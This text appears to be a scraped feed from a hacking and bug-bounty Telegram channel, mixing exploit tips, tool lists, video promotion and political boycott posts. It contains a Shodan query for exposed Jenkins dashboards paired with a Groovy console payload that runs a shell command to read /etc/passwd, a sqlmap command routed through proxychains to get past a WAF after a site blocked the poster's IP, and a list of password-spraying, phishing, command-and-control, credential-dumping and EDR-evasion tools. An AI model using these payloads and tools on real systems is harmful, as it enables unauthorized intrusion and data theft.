Exploit RCE via Groovy Console
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
#BugBounty #bugbountytips #RCE
👍25🔥7❤2
Hello everyone, use my custom and advanced Recon Engine:
https://haxshadow.github.io/reconengine/
6🔥39❤6👍3🫡3🥰1
Bypass SQL union select
#Bypass #SQL
❤16👍6
Master Wordpress Penetration Testing.pdf
6 MB
🔍 Master WordPress Penetration Testing – Secure & Exploit Like a Pro! 💻🚀
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
❤19👍5
HackTheBox Certified Penetration Tester Specialist Cheatsheet
https://github.com/zagnox/CPTS-cheatsheet
❤13🔥4
ModSecurity WAF is so easy to bypass!
I used proxychains because the site was blocking my IP after just a few attempts.
proxychains sqlmap -u 'url' --random-agent --batch --dbs --level 3 --tamper=between,space2comment --hex --delay 5
1👍29🤡5❤4🤮4💩2🥰1🍌1
XSS Hunting with Burp Suite: A Practical Guide:
https://youtu.be/qucdQ7kWHB4?si=fKT6tkTqyTTLKYv5
Are you ready to master Cross-Site Scripting (XSS) hunting? In this video, I’ll walk you through the step-by-step process of manually discovering XSS vulnerabilities using Burp Suite and how to automate the…
1👍21
Red Team Tools 🔥
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
👍17🔥9❤7👎3💩2🍌1
🕊 Peace for Palestine
No more bloodshed. No more war.
We stand with the innocent lives affected by conflict.
Raise your voice for humanity, for justice, and for peace.
No War Please!!!
✊🏼💚❤️🤍
#PeaceForPalestine #FreePalestine #NoWar #StandForHumanity #StopTheViolence #SaveGaza #PrayForPalestine
10❤86🕊16💩13🔥3🙏3💯2🤝1🗿1
It is not possible to damage a cyber power like Israel by taking down a couple of cyber attacks or useless websites.
So I would like to request everyone outside the tech field to boycott Israel completely both in the online world and offline. Through this, it is possible to break them financially. Stop using not only their online projects but also all their big services starting from online marketplaces. For example:
1. Fiverr
2. wix
3. Viber
4. Taboola
5. SimilarWeb
6. Vdoo
7. eToro
8. OutCrowd
9. Outbrain
10. Waze
We use many of these services and there are many more. We will completely refrain from using all these services from today.
❤20🤡10🔥9👍1👎1💯1
I uploaded a new video. Go to my new Telegram channel: https://t.iss.one/haxshadow
Title: Exposing Hidden API Keys with Web Scraping | Bug Bounty Recon Technique
🔥9👍4
This is my group, add it:
https://t.iss.one/shdowgp
❤6👍1
I uploaded my new video (Live Bug Bounty Recon on vmdconseil.co | Real-Time Vulnerability Hunting with Top Tools!)
https://t.iss.one/haxshadow
👍8❤4🔥4
Coming very quickly to my channel.
I'm back after a long time, everyone please support and share more. visit: https://t.iss.one/haxshadow
30
I request everyone to please come to my new channel because if you tell me, I won't post much. It's a bit of a problem, so I request everyone.
Visit: https://t.iss.one/haxshadow
1❤1
I uploaded this new video:
https://youtu.be/JlavbZMj6nM?si=U9mTl2F9OH3cUZ4w
Exposing the RDP Hacks You Didn't Know Existed
Get ready to uncover the hidden secrets of RDP hacking that bug bounty hunters and penetration testers don't want you to know. In this video, we're diving deep into the world of RDP hacking, Shodan search, and bug bounty recon techniques that will take your…
1❤5